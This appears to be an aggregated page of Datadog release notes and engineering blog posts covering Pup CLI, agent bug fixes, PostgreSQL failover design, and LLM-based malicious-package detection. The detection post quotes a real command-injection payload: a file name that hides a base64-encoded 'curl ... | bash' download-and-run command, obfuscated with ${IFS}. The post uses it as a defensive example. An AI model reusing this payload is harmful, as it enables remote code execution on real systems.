releases.shpreview
Home/Datadog
Datadog

Datadog

Pup CLI gives agents OAuth-scoped Datadog access

This release1 featureNew capabilitiesAI-tallied from the release notes

AI agents are becoming a standard part of how engineers write, deploy, and troubleshoot software. Getting observability data into those workflows, securely and without manual intervention, remains the harder problem.

Pup CLI gives shell-style agents, automation pipelines, and scripting workflows secure, OAuth-scoped access to 33+ Datadog product domains through a single binary with 200+ commands. Agents can discover commands dynamically, reason over structured JSON or YAML output, and use built-in skills and runbooks without managing long-lived API keys. Because agents pull only the commands they need via pup agent schema rather than loading a full tool definition library upfront, working context is more token efficient. The CLI pairs with the Datadog MCP Server, which covers conversational, chat-style workflows in IDEs and assistants.

In this post, you'll learn how to:

  • Give shell-style agents a CLI built for Datadog
  • Access the Datadog platform from one binary
  • Authenticate once with OAuth
  • Add Datadog skills and runbooks to your agent
  • Connect any AI client to Datadog locally

Give shell-style agents a CLI built for Datadog

AI agents interact with systems differently depending on where they run. Chat-style assistants inside IDEs need curated, conversational interfaces with confirmation gates and constrained actions. Terminal-native agents, CI/CD workflows, and automation harnesses need composable command-line access that fits naturally into shell workflows.

Modern coding agents are already fluent in shell environments. Models trained on large volumes of terminal interactions understand workflows built around commands such as git, kubectl, jq, and Unix pipes. A well-designed CLI extends an agent's operational capabilities without additional configuration. Agents can invoke commands, chain outputs, and interpret structured responses using patterns they already know.

Pup CLI builds on that model with a single, consistent Rust binary across Claude Code sessions, Cursor workflows, CI runners, runbooks, and custom agent harnesses. Regardless of where an agent runs, it interacts with the same Datadog backend through the same interface and authentication flow.

Access the Datadog platform from one binary

Pup CLI gives agents a single interface for the Datadog platform, from metrics and logs to Incident Management, Real User Monitoring, Application Performance Monitoring, Cloud SIEM, Cloud Cost Management, and more without switching tools or managing separate integrations.

The CLI is designed to be discoverable for both humans and agents. Engineers can use standard help commands to explore the available functionality, while agents can retrieve the complete command schema dynamically in machine-readable form.

pup --help
pup agent schema

The pup agent schema command returns the complete command tree as structured JSON, allowing agents to inspect available operations only when they need them. Dynamic schema retrieval reduces the amount of tool metadata that needs to remain in an agent's working context, leaving more room for reasoning and planning.

Pup CLI returns structured JSON or YAML output by default, making it easy for agents to parse and chain results into additional workflows. Commands integrate naturally with standard shell tooling such as jq, grep, or custom automation scripts.

For example, an agent investigating a production issue could search logs for recent checkout service failures:

pup logs search --query="status:error service:checkout" --from="1h" \
  | jq '.data[].attributes.message'

An agent could then pivot into monitor investigations:

pup monitors search --tags="team:api-platform"
pup monitors get <id>

Or retrieve active incidents directly from Datadog:

pup incidents list --status=active \
  | jq '.data[].attributes.title'

Beyond core observability workflows, Pup CLI also covers a broad set of the Datadog API surface. Niche admin operations, preview surfaces, and CRUD support for platform configuration objects are reachable through the same binary and authentication layer, without additional setup.

Authenticate once with OAuth

Many teams rely on long-lived API and application keys spread across shell environments, CI pipelines, Terraform configurations, and internal documentation. Pup CLI addresses this with an OAuth 2.0 + PKCE authentication flow.

Instead of distributing static API keys across multiple environments, you authenticate once through:

pup auth login

Tokens are scoped, revocable, and aware of multi-organization environments. If a device is lost or access needs to be revoked, you can invalidate the associated credentials without rotating every script or automation workflow tied to a static key.

Pup CLI inherits Datadog role-based access control. Agents can only view or act on the resources their authenticated user is already authorized to access. This helps you preserve existing access boundaries while extending Datadog into AI-assisted workflows, including for teams with HIPAA requirements.

A single authenticated session can support multiple local agent workflows, including Claude Code, Cursor, OpenCode, custom agents, and ad hoc scripts. You no longer need to provision and manage separate API keys for every tool or environment.

Managing API keys across CI pipelines, shell environments, and agent tools adds friction when you adopt AI-assisted operations. Pup CLI helps reduce that friction by consolidating access through a single OAuth-scoped interface, using a centralized audit trail and your existing Datadog permissions.

Add Datadog skills and runbooks to your agent

Pup CLI ships with built-in skills and subagents that give agents reusable operational workflows without manual prompt crafting.

For example, you can install bundled skills into Claude Code:

pup skills install claude-code

This command installs skills into .claude/skills/ and native subagents into .claude/agents/.

Cursor workflows are similarly supported:

pup skills install cursor

You can also browse and install individual skills:

pup skills list
pup skills install claude --name=dd-monitors

Pup CLI integrates directly with the Claude Code plugin marketplace as well:

/plugin marketplace add datadog/pup

The bundled skills support operational workflows such as incident triage, log, metric, and trace correlation, change tracking, and Database Monitoring analysis. If you're using Claude Code, you can invoke a workflow such as /sre-investigate and receive a guided investigation that moves through logs, traces, deployments, and database telemetry while the agent calls Pup CLI commands behind the scenes. You can use runbook outputs directly in incident reviews and postmortems.

Pup CLI also supports CI/CD automation scenarios such as deploy event creation, source map uploads, DORA metrics collection, and SLO validation. Each of these workflows uses the same OAuth-scoped authentication as local sessions, so no additional secrets management is needed.

Connect any AI client to Datadog locally

Pup CLI also doubles as an MCP server, letting you connect any MCP-compatible AI client to Datadog without additional authentication or setup steps beyond pup auth login.

The same OAuth session supports Claude Desktop, third-party MCP clients, and custom integrations:

pup mcp serve

This gives you a way to connect Datadog to emerging AI clients as they adopt the Model Context Protocol standard, without waiting for native integrations or managing separate credentials.

Getting started

Pup CLI is available on GitHub. Installation follows the standard Rust toolchain pattern:

cargo install --git https://github.com/DataDog/pup.git
pup auth login
pup --help

For Claude Code users, you can install Datadog skills immediately:

pup skills install claude-code

Or install the plugin from the Claude Code marketplace:

/plugin marketplace add datadog/pup

Full documentation is available on the Datadog docs site.

Learn more at DASH

We're showcasing Pup CLI, the Datadog MCP Server, Bits AI, and the future of agentic observability at DASH NYC on June 9-10. Come see live demos, chat with our engineers, and explore how to give your AI agents first-class access to the Datadog platform.

Claude Agent errors now show descriptive messages; service name race fixed

This release5 fixesBug fixesAI-tallied from the release notes
Bug Fixes
  • LLM Observability: This fix resolves an issue in the Claude Agent SDK integration where a span's error message showed an uncategorized unknown error category from the upstream Claude Agent SDK instead of a descriptive API error. The integration now surfaces the detailed error message from the assistant message content.
<!-- -->
  • tracing: Fixes a race condition where extra service names could be silently dropped from Remote Configuration /v0.7/config payloads in multi-threaded applications (e.g. uWSGI).
<!-- -->
  • code origin: fixed an issue that could have caused pytest to crash internally when inspecting the call stack from an exception thrown by a view function when Code Origin is enabled.
<!-- -->
  • LLM Observability: Resolves an issue where non-string tag values passed to LLMObs.annotate(tags=...) could cause spans to be dropped during ingestion.
<!-- -->
  • LLM Observability: Fixes provider mis-attribution on openai spans when an OpenAI (or AsyncOpenAI) client and an AzureOpenAI (or AsyncAzureOpenAI) client are instantiated at the same time. Provider is now determined per-call rather than from the most recently constructed client.

Bits Agent Builder — custom AI agents for alert response and remediation

This release1 featureNew capabilitiesAI-tallied from the release notes

Building automated workflows that adapt to real-world complexity can be a challenge. As systems scale and scenarios multiply, teams often end up hardcoding endless logic branches just to handle every potential outcome.

That's why we're introducing Bits Agent Builder, a powerful new tool that lets you create custom AI agents that are fully hosted by Datadog. These agents can analyze data, reason through complex decisions, and adapt to changing inputs in real time, all without requiring you to hardcode every possible path. With AI-driven orchestration, Datadog Workflow Automation can now power automations that think, react, and scale as intelligently as your systems do.

In this blog post, we will cover the following topics:

  • What is Bits Agent Builder?

  • What types of workflows can you automate with Bits Agent Builder?

What is Bits Agent Builder?

Bits Agent Builder lets you define AI agents that can interpret Datadog observability data and third-party signals—such as which service is affected, what metrics are spiking, or whether similar incidents have occurred—and then take action either automatically through a workflow or on demand through chat. You can describe an agent's goals in natural language, include relevant prompts, and control which data sources and tools it can access. This makes it possible to design agents that reflect the specific architecture, technology stack, and operational patterns of your environment.

Workflows can also chain multiple agents together or trigger agents conditionally based on the situation. For example, an investigation agent might analyze logs and traces to identify a likely root cause, then trigger a remediation agent if the suggested fix matches a known pattern—such as restarting a service, rolling back a deployment, or scaling a resource. These chains allow different agents to specialize in distinct steps of an operational process while maintaining end-to-end automation and control. By orchestrating agents this way, teams can build workflows that reason, act, and adapt in real time, without sacrificing the structure and safety of traditional automation.

What types of workflows can be automated with Bits Agent Builder?

Teams can use Bits Agent Builder to make smarter, faster decisions that draw upon the full range of Datadog's observability data. A key feature of custom agents built with Bits Agent Builder is that they have access to the 2,000+ prebuilt, production-ready actions from Datadog's Action Catalog. As shown in the image below, these actions connect to external services such as Kubernetes, cloud services, CI/CD platforms, security tools, and more.

Thanks to these built-in integrations with third-party services, you can automate virtually any task without requiring custom code or external integrations. And since your agents run natively in Datadog, your data, logic, and actions all live in one place with no context lost.

To see what this looks like in practice, let's explore some ways you can use Bits Agent Builder to automate complex workflows.

Automate application error investigations

Consider an agent created with Bits Agent Builder to automate the investigation of application errors. This investigator agent runs automatically when a Customer Success Manager or Support Engineer posts a Slack message such as "User reports the app crashed" about a bug. Once triggered, the agent runs a predefined playbook that pulls evidence only from trusted Datadog sources—such as logs, APM, and RUM—to ensure consistent, high-quality investigations. Following the playbook, the agent first searches recent application logs for related errors or warnings, and then checks RUM data to see if any users have experienced similar frontend issues or performance slowdowns. As it collects data, it follows strict standards: Every log or trace is hyperlinked, assumptions are clearly marked, and if nothing is found, it states that clearly.

Finally, the agent compiles a structured report—summarizing findings, linking to evidence, and suggesting possible root causes—and posts it back into Slack. By the time engineers pick up the issue, they already have a data-backed investigation that meets company best practices, powered entirely by Datadog's observability data and AI-driven automation.

Detect and respond to a critical vulnerability

In a second example, imagine how a custom agent could be used to automate a response when critical vulnerabilities are detected. Let's say that Datadog Cloud Security detects several EC2 instances running a vulnerable version of OpenSSL that is affected by a newly disclosed critical CVE, such as CVE-2023-0464. The agent starts by creating a Datadog case, consolidating all relevant details (such as instance IDs, AWS account information, and whether the hosts are internet-facing) to give the security team immediate visibility into the blast radius.

Once the vulnerability is confirmed as high-risk, the agent steps in to contain the threat. It can generate a Github PR to update the OpenSSL version or quarantine the affected EC2 instances by using AWS Systems Manager. It can then notify the responsible engineering team through Slack, Datadog On-Call, or PagerDuty. Every remediation action is logged back into the Datadog case, creating a complete audit trail. This automated, end-to-end response pipeline helps teams move from detection to remediation in minutes, significantly reducing exposure time and strengthening their overall cloud security posture.

Automate service documentation with IDP Scorecards

Scorecards in Datadog's Internal Developer Portal (IDP) help teams measure and enforce operational and engineering standards across their services in areas like deployment readiness, observability coverage, or documentation completeness.

In this use case, a scorecard is configured to assess whether each service repository includes a README.md file. During the scorecard evaluation, if the check detects that a service is missing a README, it triggers a custom Datadog agent. This agent uses metadata from the Service Catalog (like team name, dependencies, and runtime environment) and pulls key context from telemetry data and existing dashboards to auto-generate an initial README draft. It can include sections like "Service Overview," "Dependencies," and "Runbook Links," and then open a pull request in GitHub for the owning team to review and finalize.

By combining Scorecards with automation, teams can close documentation gaps automatically—evaluating, creating, and updating service standards with minimal manual work.

Try Bits Agent Builder Today

With Bits Agent Builder, engineers can create and manage purpose-built agents in minutes, accelerating how teams investigate issues and trigger actions across their environments.

Bits Agent Builder is now generally available. You can try it out by navigating to Actions -> Agents in your Datadog account.

If you don't already have a Datadog account, get started with a 14-day free trial today.

When failover isn't safe: Building high-availability PostgreSQL on Kubernetes

Gamedays are one of the most effective ways we proactively uncover gaps in our systems and processes. At Datadog, we regularly run a variety of gamedays to intentionally stress our platforms and learn how our systems and teams respond under real-world conditions. These exercises help us surface hidden vulnerabilities, strengthen our operational readiness, and continually raise the bar for our infrastructure.

During one such gameday, a simulated zonal failure introduced targeted disruptions in an availability zone on a staging environment by inducing network latency, which exposed a weakness in our PostgreSQL architecture. Several of our Kubernetes-based PostgreSQL clusters had primary or writer nodes running in the affected availability zone. As network latency spiked, those primaries could no longer communicate reliably with their replicas. Replication lag quickly grew, writes stalled, and applications began serving stale data. Because no replica was sufficiently up to date, failover wasn't safe and the clusters were effectively stuck.

We rely on PostgreSQL as the backend database for many Datadog products, and this architecture has served us well under normal conditions. But the gameday revealed an uncomfortable truth: In the face of certain network failures, our setup prioritized availability over durability in ways that left us with no safe recovery path.

In practice, this meant the primary continued accepting writes even while replication to replicas was delayed due to elevated network latency. The system remained writable, but replication lag continued to grow, and replicas drifted further behind the primary. As a result, failover candidates could no longer be promoted safely without risking data loss. We were left with only one viable option: wait for latency to subside and for replicas to catch up.

We set out to fix this failure mode. Our goal was to make failover both automatic and safe, without compromising PostgreSQL's performance characteristics more than necessary. To do this, we rearchitected our PostgreSQL deployment to use synchronous replication for failover candidates, coordinated by Patroni, an open source high-availability manager.

In this post, we'll walk through how we redesigned our Kubernetes-based PostgreSQL clusters for failover safety, how we balanced durability against latency, and what we learned while validating this approach through benchmarking and failure testing.

PostgreSQL on Kubernetes: Our baseline architecture

Our Kubernetes-based PostgreSQL clusters are organized into two main pools: a leader pool and a read replica pool. In our architecture, PostgreSQL is a single-writer system, and this separation lets us scale reads independently without overwhelming the leader with a mix of reads and writes. As a result, we can increase read capacity as demand grows while keeping write latency predictable and stable.

The leader pool consists of a single active writer node that handles all write operations, along with two standby nodes. These standbys do not serve application traffic, but they can be promoted if the leader becomes unavailable.

The read replica pool includes multiple nodes that handle read-only traffic. These replicas are optimized for read scalability and query isolation, so they are intentionally excluded from failover.

This design worked well under normal operating conditions, but as we discovered during a zonal failure, it also imposed strict limits on which nodes could safely take over when the leader was impaired.

PostgreSQL high-availability architecture on Kubernetes using Patroni and ZooKeeper. The leader pool manages write operations, while read replicas serve read-only traffic. ZooKeeper coordinates leader election and ensures consistent cluster state.

We use Patroni to manage replication, failovers, and leader elections for our PostgreSQL clusters. Patroni relies on a distributed configuration store (DCS)—in our case, ZooKeeper—to coordinate leader election, maintain a shared view of cluster state, and enforce a single active leader at any point in time.

ZooKeeper stores metadata, including the current leader key/lock, cluster configuration, and each member's replication state, such as its latest log sequence number (LSN). Patroni uses this information to make conservative decisions about promotion and demotion, prioritizing data consistency over aggressive failover.

When a new node joins the cluster, it first checks ZooKeeper to determine whether a leader already exists. If no leader is present, the node attempts to acquire the leader key by creating an ephemeral znode. ZooKeeper guarantees only one node can acquire this leader key, which prevents multiple primaries from forming. If a leader already exists, the joining node configures itself as a replica and starts streaming replication.

During a network partition, this caution becomes especially important. A replica that loses connectivity to either the leader or ZooKeeper cannot reliably determine the cluster's current state. Rather than risk an unsafe promotion, Patroni pauses or demotes the affected node until leadership can be verified.

Similarly, if the leader loses connectivity, Patroni coordinates with ZooKeeper to ensure that only a single, eligible standby can acquire the leader lock. This process guarantees that failover happens in a controlled way, even under partial network failure. The following diagram shows how Patroni safely promotes a new primary during a network partition and how the original leader demotes itself after failing to reacquire the leader lock once connectivity is restored.

Sequence of events during a network partition in a Patroni-managed PostgreSQL cluster. When the primary loses connectivity, ZooKeeper releases the expired leader key, allowing an eligible standby to acquire the lock and become the new primary. Once the original primary regains connection, it demotes itself to standby to prevent split brain and rejoins replication.

Why our architecture couldn't fail over safely

Our PostgreSQL architecture uses a single-writer model: Only one leader node accepts writes. During a failure, Patroni is responsible for electing a new leader from among healthy standby nodes.

To protect against data loss, Patroni performs a series of safety checks before promoting a standby. One of the most important is verifying that replication lag is within an acceptable threshold, configured through the maximum_lag_on_failover parameter. If a standby has fallen behind the leader, promoting it could result in missing or inconsistent data.

This safeguard became the limiting factor during our gameday. When the primary node lost connectivity, all available standbys had accumulated replication lag beyond the configured threshold. Because no standby was sufficiently up to date, Patroni correctly rejected the failover attempt. The cluster remained without a safe writable primary not due to Patroni, but because there was no safe promotion candidate.

The following diagram illustrates how Patroni evaluates replication lag during failover and why it refuses promotion when all standbys exceed the maximum_lag_on_failover limit.

Patroni checks replication lag before promoting a standby. If the lag on all standby nodes exceeds the configured maximum_lag_on_failover threshold, failover is rejected to prevent data loss.

Asynchronous replication vs. synchronous replication

To improve the availability of our PostgreSQL clusters, we revisited our replication strategy, specifically the two modes supported by PostgreSQL's streaming replication.

In streaming replication, the leader continuously streams write-ahead logs (WALs) to its replicas. These logs capture all changes to the database. Replicas stay in sync by applying the WALs locally.

PostgreSQL supports two modes of streaming replication: asynchronous replication, which is the default, and synchronous replication.

Asynchronous replication (default)

In our original setup, PostgreSQL used asynchronous replication. In this mode, the leader does not wait for acknowledgment from replicas before committing a transaction.

This configuration minimizes write latency and supports high-throughput workloads. However, if the leader fails, transactions that were committed on the primary but not yet replicated to a standby can be lost during leader promotion.

Synchronous replication

PostgreSQL also supports synchronous replication. In this mode, the leader waits for acknowledgement from at least one replica before sending the transaction response to the client. This significantly reduces the risk of at least one replica drifting too far behind the primary and provides stronger durability guarantees compared to asynchronous replication, since committed transactions are confirmed to exist on another node before the client sees a successful response.

With synchronous replication, failover candidates are more likely to be up to date, and a standby can be promoted without risking data divergence.

Our hybrid replication setup

To balance durability, latency, and throughput, we adopted a hybrid replication model:

  • Standby nodes in the leader pool participate in synchronous replication. This allows the leader to wait for confirmation from designated synchronous standbys before committing writes.

  • Read replicas continue to use asynchronous replication. They serve read-only traffic and are not considered for failover, which helps limit replication overhead on the leader pool.

This approach lets us apply stricter durability guarantees to failover candidates without imposing the same latency costs on read replicas.

How we tuned PostgreSQL and Patroni for safe failover

Enabling synchronous replication required changes in both PostgreSQL and Patroni, which manages leader election and failover for our clusters.

Docker daemon connectivity restored; AppSec webhook fixed

This release5 fixesBug fixesAI-tallied from the release notes
Datadog Agent · v7.79.2

Agent

Prelude

Released on: 2026-06-03

Security Notes
  • Bumped containerd dependencies to mitigate CVE-2026-46680: github.com/containerd/containerd to v1.7.32 and pinned github.com/containerd/containerd/v2 to v2.0.9 (the EOL v2.1.x line has no fix).
Bug Fixes
  • Use the Docker daemon's /ping endpoint instead of /info to verify connectivity during DockerUtil initialization. Some daemons emit DefaultAddressPools[].Base values in /info that are not valid CIDRs, which fail the strict netip.Prefix decoding introduced by the moby v29 client and previously caused DockerUtil to fail to initialize. This cascaded into the Docker workloadmeta collector and the Docker core check being unavailable, leading to missing container/image tags on metrics and traces from Docker containers.

  • Fix the Agent's Docker integration against Docker daemons that return malformed values in their /info response. The failure was visible in Agent logs as:

    Docker init error: temporary failure in dockerutil, will retry later:
    Error reading remote info: netip.ParsePrefix("invalid Prefix"): no '/'

    When triggered, it prevented the Docker integration from initializing, which cascaded into:

    • missing container and image tags on metrics, traces and logs collected from Docker containers,
    • missing docker_version and docker_swarm entries in host metadata,
    • missing docker_swarm_node_role host tag on Docker Swarm nodes,
    • in containerized deployments without an explicit DD_HOSTNAME, the Agent could refuse to start because the Docker hostname provider could no longer determine a hostname.
  • Add the macOS hardened-runtime Location Services entitlement (com.apple.security.personal-information.location) to signed Agent binaries in order to trigger the system location permission prompt properly.

Datadog Cluster Agent

Prelude

Released on: 2026-06-03 Pinned to datadog-agent v7.79.2: CHANGELOG.

Bug Fixes
  • Cluster Agent: Evaluate AppSec sidecar admission webhook match conditions against the deleted object for pod deletion requests.
  • Cluster Agent: Prevent disabled AppSec proxy injection cleanup from enabling the AppSec sidecar admission webhook.

Bedrock Converse/ConverseStream support; OTLP trace IDs now 128-bit

This release1 featureNew capabilities5 fixesBug fixesAI-tallied from the release notes
  • [bd9c62865a] - (SEMVER-PATCH) fix(cucumber): support v13 parallel mode (Juan Antonio Fernández de Alba) #8748
  • [5beadb493f] - (SEMVER-PATCH) test(ci): harden sandbox cleanup (Juan Antonio Fernández de Alba) #8741
  • [80fbfd2b7e] - (SEMVER-PATCH) fix(vitest): pin node 18 vitest 3 version (Juan Antonio Fernández de Alba) #8747
  • [5ef172cd28] - (SEMVER-MINOR) feat(aws-sdk, llmobs): support Bedrock Converse and ConverseStream (Alexandre Choura) #8079
  • [c8eb110fc1] - (SEMVER-PATCH) fix(llmobs/ai): surface prompt cache tokens for Vercel AI SDK integration across all supported providers (Jessica Gamio) #8530
  • [6588ac18da] - fix(otlp): Ensure all OTLP spans get the full 128-bit trace IDs (Zach Montoya) #8618
  • [376bad086b] - (SEMVER-PATCH) test(profiling): add retries to OOM heap profile tests for Node 26 compatibility (Attila Szegedi) #8742
  • [e46c478d65] - (SEMVER-PATCH) chore(deps): bump the serverless group across 1 directory with 11 updates (dependabot[bot]) #8738
  • [fe0be207ed] - (SEMVER-PATCH) chore(deps): bump the ai-and-llm group across 1 directory with 5 updates (dependabot[bot]) #8736
  • [e83cf13cdf] - (SEMVER-PATCH) fix(profiling): route logger calls through central log module (Ayan Khan) #8697
  • [908c8119d2] - (SEMVER-PATCH) chore(deps): bump openai (dependabot[bot]) #8735
  • [03116dfb95] - (SEMVER-PATCH) ci(release): fix validation workflow never triggering on proposal branches (Roch Devost) #8714
  • [3b6d66c138] - (SEMVER-PATCH) test(aws-sdk): fix flaky stepfunctions startExecution span assertion (Roch Devost) #8717
  • [0687e2f44f] - (SEMVER-PATCH) fix(ci): handle stale failure conclusion in all-green retry (Roch Devost) #8599

Attackers are increasingly targeting the software supply chain, compromising widely used dependencies to distribute malicious code downstream at scale. Over the past few months alone, incidents involving packages like axios, LiteLLM, and Mistral showed how quickly these attacks can spread across trusted ecosystems.

In our previous post, Detecting malicious pull requests at scale with LLMs, we introduced BewAIre, a system we built to detect malicious code in pull requests by using large language models (LLMs). BewAIre quickly became a reliable part of our security workflows, helping us identify penetration tests, bug bounty activity, and real-world attacks, including activity from the recent Hackerbot campaign.

But pull requests are only part of the attack surface. We wanted to answer a harder question: Could we extend the same LLM-based detection approach to entire dependency packages and upstream package registries without sacrificing accuracy, latency, or predictable cost?

In this post, we show how we expanded BewAIre from pull request analysis to large-scale package scanning by combining stacked LLM evaluations with tool-driven investigation loops. We'll walk through the engineering trade-offs behind scaling malicious code detection across ecosystems while maintaining high accuracy and operational efficiency.

How BewAIre uses agentic investigation to catch what LLM-as-judge misses

BewAIre began as a simple LLM-as-judge system: Send a diff to an LLM inference API and get an evaluation back. After a few months of prompt engineering and fine-tuning, we started to hit a few natural limits. More capable reasoning models improved accuracy, but they came at a higher cost. At the same time, large diffs, especially those from dependency upgrades, pushed against context window limits.

We had seen enough early success to keep investing in this approach, but we needed to reach the next layer of performance.

After initial investigation, we focused on two changes that made the biggest difference:

  • Two-stage evaluation: A filter-then-assess escalation path

  • Tools for active investigation: Allows the model to gather additional context instead of relying only on the diff

In keeping with our naming scheme, we now refer to this as the filter and the review phases.

How stacked LLM calls cut false positives

Rather than running a single expensive analysis on every incoming change, BewAIre uses a two-stage evaluation pipeline: the filter phase, which screens all changes quickly and cheaply, and the investigation phase, which performs deeper investigation.

The first pass uses an inexpensive model, typically the previous generation's state-of-the-art (SOTA) model or the current generation's high-speed, low-cost variant. It runs with a straightforward prompt and the diff-chunking strategy we outlined in our first post for especially large diffs.

This first pass asks a simple question: Does anything in this change look suspicious?

The verdict is binary: either suspicious or benign. If the first pass clears a pull request as benign, the pipeline exits immediately and the second pass never runs. However, when the first evaluation loop raises a flag, we escalate to our second check, which is an agentic investigation loop with access to tools.

This second investigation phase is an agentic system that relies on a higher-powered reasoning model. Rather than passively reading a diff, it actively investigates. It can call GitHub APIs to list commits, inspect file contents, review contributor histories, examine dependency metadata, and compare commit ranges.

Notably, the investigation agent can explore whether suspicious commits were quietly reverted to hide changes from the final diff, whether a dependency resembles a typosquatting attack, and whether an author's account history and affiliation align with legitimate contribution patterns. Dependencies referenced in the PR can be validated against resources like osv.dev and Datadog's Software Composition Analysis (SCA).

The resulting system looks like this:

Two-stage evaluation pipeline for malicious pull request and package analysis.

This two-stage pipeline had dramatic results, improving our accuracy from 97.4% to 99.86% over our representative sample set of 690 test diffs, primarily by dropping our false positives from 17 to 0. It also reduced latency by allowing the vast majority of benign pull requests to exit early, while preserving thorough coverage when something looks suspicious.

You can see how the wider context, such as PR state and author background, improves accuracy between our first- and second-stage evaluations in the recent Hackerbot Claw attack.

Filter stage assessment:

Diff creates a file named with shell command substitution: documentation/rules/m$(echo${IFS}Y3VybC...|base64 -d|bash).md. The embedded base64 decodes to a curl ... | bash payload. This is an attempt to download and execute remote code via filename expansion (remote code execution/backdoor).

Agentic investigation verdict:

This PR contains a clear command injection attack embedded in the filename. The filename `m$(echo${IFS}Y3VybCAtc1NmTCBoYWNrbW9sdHJlcGVhdC5jb20vbW9sdHwgYmFzaA${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash).md` uses shell command substitution with base64-encoded payload that decodes to `curl -sSfL hackmoltrepeat.com/molt| bash`, which attempts to download and execute malicious code from an external server. The `${IFS}` technique is used to obfuscate the command and bypass security filters. The author 'hackerbot-claw' is a newly created account (7 days old) with no profile information, and zero followers - typical indicators of a throwaway attacker account. The PR has no reviews or approvals.

As a consequence of this approach, the filter phase also needed to be fine-tuned and made extra wary of changes to avoid false negatives or degradation in quality. We saw one example of this with domain typosquatting attacks, where, without access to tools that allowed it to do exploratory work, it would incorrectly classify Datadog-like domains as legitimate use cases.

To build around this limitation, we added a preprocessing pipeline that extracts all domains from the input and performs checks against a static list of typosquatting attack variants generated from a legitimate Datadog domain list. This allows the simple chat completion prompt to know if an attacker is using a Datadog-adjacent domain to try to fool the prompt, and provides a clear example of how expensive, nondeterministic LLM checks can be combined with static checks to improve accuracy while maintaining cost.

Evaluating the software supply chain

This stacked approach has allowed us to expand the coverage of what we scan with BewAIre, evaluating an increasing share of the source code deployed to Datadog's environments while keeping our accuracy high and latency/cost low. Although evaluating diffs and pull requests is critical for protecting against insider risk or compromised accounts, and crucial as the volume of agent-generated code grows, we knew that scanning packages would add a new set of constraints.

How we handled context limits when scanning full dependency packages

Packages introduce a different set of challenges, and the biggest initial constraint we faced was size: packages and package upgrades often average a much larger number of lines of code than your average pull request.

While BewAIre's pre-filter phase can manage large files through chunking, the agentic reviewer stage introduces another constraint: a different context window that differs from the first. Resending full packages pushed us past context limits and increased cost, sometimes leading to context truncation or fallback to our filter's evaluation.

To address this, we ran three parallel experiments to identify an approach that would scale:

  • Forward only the malicious chunk identified by the filter.

  • Rechunk the entire package using the investigation agent's model context window.

  • Provide the investigation agent with a codemap and tool access, where the codemap is a concise structural overview of the codebase (file paths, sizes, and symbol locations), along with a verdict from the filter. The investigation agent can then use a ReadFile(filename, start_line, end_line) tool to inspect specific files on demand.

Three strategies for handling large packages: passing a single suspicious chunk, rechunking the full package, or using a codemap with targeted file reads.

The following table shows the results of our experiments across all malicious packages in our curated dataset. Strategy C (codemap + read_file) emerged as the preferred option because it matches the top exact-match accuracy of the other strategies, reduces error rates, and improves latency and cost compared to the baseline. In practice, this makes it more reliable for large packages while remaining efficient, giving us the highest end-to-end accuracy with a reasonable runtime and a scalable design.

In the table, end-to-end accuracy is approximated as exact_match × (1 − error_rate), combining prediction quality with the impact of runtime and API failures:

StrategyImplementationPerformance trend (vs. baseline)End-to-end accuracy
Baseline (no strategy)Filter → agent pipeline with no extra context management; agent sees the full package when it fits and errors on oversized inputs (fallback to the filter verdict).Reference point: High latency and significant error rate on large packages.94.1%
Strategy 1: Reuse chunkingSame filter → agent pipeline but reuses chunking logic for V2 on large inputs (minimal behavioral change vs. baseline in practice).Marginal change: Slight increase in error rate and negligible latency improvement.93.7%
Strategy 2: Agent phase chunkingAgent wrapped in RunWithChunking: Large inputs are split into up to N chunks (depending on input size), processed in parallel, and combined with an "any chunk malicious → package malicious" rule.Efficiency gain: Significant reduction in error rates and faster average duration.94.9%
Strategy 3: codemap + read_fileAgent receives a lightweight codemap plus a read_file tool to load specific files on demand, instead of ingesting the entire package or chunking it.Optimal balance: Eliminates runtime errors and maintains top-tier recall while drastically reducing token costs.95.2%
Scaling with predictable cost

Scanning tens of thousands of dependency packages for maliciousness sounds compelling in a perfect world where cost and latency are not constraints, but we needed to know whether we could integrate these systems practically and at scale.

After running evaluations against our curated dataset of malicious packages, and projecting against the token size distribution of the top 10,000 npm packages, we reached a clear conclusion. Because of our two-stage evaluation loop, costs are low, stable, and—most importantly—predictable for 95% of packages.

Memory leaks fixed in profiling, SCA, and periodic timers

This release4 fixesBug fixesAI-tallied from the release notes
Bug Fixes
  • internal: Fixed an issue that could have caused some timers, like the one responsible for Symbol Database uploads, to fire repeatedly after the first execution.
<!-- -->
  • internal: This fix resolves a memory leak where reference cycles through PeriodicThread callbacks were invisible to Python's cyclic garbage collector and could accumulate when threads used bound methods as targets.
<!-- -->
  • profiling: Fixes a memory leak in native frame tracking caused by unbounded native call-site metadata growth.
<!-- -->
  • SCA: This fix resolves an issue where unresolved runtime reachability targets could accumulate across Software Composition Analysis updates, causing resident memory usage to grow over time.

In AWS environments, a data perimeter is a set of preventative controls that help ensure that your trusted cloud identities (principals or AWS services acting on your behalf) are accessing trusted resources from authorized networks. You can apply these controls at various levels of your infrastructure, such as per resource or across all resources in your AWS account.

The ability to apply controls at different levels creates an effective defense-in-depth approach to protecting data, but it also makes it hard to know where gaps exist. Datadog's 2025 Cloud Security report found that approximately 40% of organizations use data perimeters, with most applying them per resource. Of that group, [fewer than 1% use recommended organization-level solutions](https://www.datadoghq.com/state-of-cloud-security/#2:~:text=SCPs%20(0.6%25%20of%20organizations), such as resource control policies (RCPs) and service control policies (SCPs).

In this post, we'll walk through examples of data perimeters configured per resource, since that's where most organizations apply them. Then we'll look at the security gaps that resource-level controls can create. In each section, we'll simulate an attack against each gap by using Stratus Red Team, an open source threat emulation tool, and then apply an organization-level policy that closes the gap.

We'll cover four scenarios:

- Visibility: ensuring that you have visibility into data perimeter activity, an important first step before applying any controls

- Identity perimeters: preventing identities outside your AWS account from accessing your data

- Network perimeters**:** validating that identities can only access resources from authorized networks

- Resource perimeters: ensuring that identities are not able to transfer data to unauthorized resources

All of the attack techniques described in this post require Stratus Red Team to be installed and configured with a compromised-role profile. We'll walk through configuring the necessary roles and AWS profiles later.

Ensure that you have visibility into data perimeter activity across your AWS infrastructure

While not strictly a data perimeter objective, AWS security benchmarks require that CloudTrail is enabled and configured to log read and write management events. CloudTrail trails can capture when a particular policy blocked or allowed access as well as any changes to the controls themselves, such as a bucket policy modification. Because cloud logs provide valuable insights into how your data perimeters respond to requests, tampering with logging is a popular defense evasion technique.

